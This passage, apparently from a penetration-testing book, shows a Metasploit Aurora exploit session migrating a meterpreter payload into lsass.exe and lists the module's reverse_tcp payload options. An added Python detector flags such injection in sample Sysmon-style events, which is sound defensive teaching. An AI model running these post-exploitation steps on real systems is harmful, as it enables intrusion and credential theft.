Chapter 8
meterpreter > run migrate
[*] Current server process: IEXPLORE.EXE (2120)
[*] Migrating to lsass.exe...
[*] Migrating into process ID 680
[*] New server process: lsass.exe (680)
meterpreter >
This is a pretty manual process. You can automate it by using some advanced options that migrate to a process automatically upon a successful shell. Type show advanced to list the advanced features of the Aurora module:
msf exploit(ms10_002_aurora) > show advanced

Module advanced options:

   Name           : ContextInformationFile
   Current Setting:
   Description    : The information file that contains context information

   Name           : DisablePayloadHandler
   Current Setting: false
   Description    : Disable the handler code for the selected payload

   Name           : EnableContextEncoding
   Current Setting: false
   Description    : Use transient context when encoding payloads

   Name           : WORKSPACE
   Current Setting:
   Description    : Specify the workspace for this module

Payload advanced options (windows/meterpreter/reverse_tcp):

   Name           : AutoLoadStdapi
   Current Setting: true
   Description    : Automatically load the Stdapi extension

   Name           : AutoRunScript
   Current Setting:
   Description    : A script to run automatically on session creation.

   Name           : AutoSystemInfo
   Current Setting: true
   Description    : Automatically capture system information on initialization.

   Name           : InitialAutoRunScript
   Current Setting:
   Description    : An initial script to run on session created (before AutoRunScript)

   Name           : ReverseConnectRetries
   Current Setting: 5
   Description    : The number of connection attempts to try before exiting the process
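
From the defender's side, the migration shown earlier on this page (IEXPLORE.EXE, PID 2120, moving into lsass.exe, PID 680) leaves a trace that endpoint telemetry can catch. The following is an added example, not code from the book or from Metasploit; it assumes migration is carried out by injecting a thread into the target process and that a Sysmon-like sensor records process access (Event ID 10) and remote thread creation (Event ID 8). The event shape, the sample events and the function names are constructed for illustration.

```python
from ntpath import basename

# Process access rights that thread injection needs (Windows SDK values).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_WRITE

PROTECTED_TARGETS = {"lsass.exe"}   # migration target in the session above
USER_FACING = {"iexplore.exe"}      # migration source in the session above
LSASS = r"C:\Windows\System32\lsass.exe"

# Constructed events in a simplified Sysmon-like shape (not captured from a real host).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Program Files\Internet Explorer\IEXPLORE.EXE",
     "SourceProcessId": 2120, "TargetImage": LSASS, "TargetProcessId": 680,
     "GrantedAccess": "0x1F0FFF"},
    {"EventID": 8, "SourceImage": r"C:\Program Files\Internet Explorer\IEXPLORE.EXE",
     "SourceProcessId": 2120, "TargetImage": LSASS, "TargetProcessId": 680},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "SourceProcessId": 904, "TargetImage": LSASS, "TargetProcessId": 680,
     "GrantedAccess": "0x1000"},   # query-only access, not enough to inject
    {"EventID": 8, "SourceImage": r"C:\Users\Public\updater.exe",
     "SourceProcessId": 3012, "TargetImage": LSASS, "TargetProcessId": 680},
]

def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return basename(path).lower()

def classify(event):
    """Return None, 'high' or 'critical' for a single event."""
    if image_name(event["TargetImage"]) not in PROTECTED_TARGETS:
        return None
    if event["EventID"] == 8:        # CreateRemoteThread into a protected process
        injecting = True
    elif event["EventID"] == 10:     # ProcessAccess: handle must allow write + thread
        injecting = (int(event["GrantedAccess"], 16) & INJECT_MASK) == INJECT_MASK
    else:
        return None
    if not injecting:
        return None
    # A browser reaching into lsass.exe is the pattern from the session above.
    return "critical" if image_name(event["SourceImage"]) in USER_FACING else "high"

def detect(events):
    """Return (EventID, source PID, target PID, severity) for every flagged event."""
    return [(e["EventID"], e["SourceProcessId"], e["TargetProcessId"], sev)
            for e in events if (sev := classify(e))]
```

Running detect(SAMPLE_EVENTS) flags both browser-to-lsass.exe events as critical, the unknown binary as high, and ignores the query-only svchost.exe access.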